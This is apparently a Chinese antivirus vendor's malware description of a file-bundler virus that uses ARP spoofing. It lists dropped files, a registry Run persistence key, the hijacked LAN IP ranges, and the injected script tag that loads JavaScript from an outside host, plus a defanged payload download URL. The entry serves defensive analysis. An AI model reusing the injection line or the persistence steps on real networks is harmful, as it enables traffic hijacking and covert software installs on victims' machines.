病毒名称(中文):
病毒别名:
威胁级别:★★☆☆☆
病毒类型:文件捆绑器
病毒长度:196608
影响系统:WinNT Win2000 WinXP Win2003
病毒行为:
该病毒是一个具有ARP欺骗攻击的病毒。病毒运行后会复制自身至系统文件夹,然后释放病毒文件,生成注册表启动项以开机运行。病毒会向局域网80端口发送病毒数据,修改网页源码,下载大量隐蔽软件安装至用户计算机。
1.复制自身至
%sys32dir%\drivers\svchost.exe
释放
%sys32dir%\Packet.dll
%sys32dir%\WanPacket.dll
%sys32dir%\wpcap.dll
%sys32dir%\drivers\npf.sys
%sys32dir%\drivers\scvhost.exe
2.生成启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KVP "%sys32dir%\drivers\svchost.exe"
3.发送 ARP 欺骗扫描局域网,劫持
172.16
192.10
10.0
开头的IP段,向发送至80端口的数据包中插入
< script language=\"javascript\" src=\"http://flyget.8800.org/ad.js\">
4.下载大量隐蔽软件安装至用户计算机
hxxp://flyget.8800.org/xxx.exe
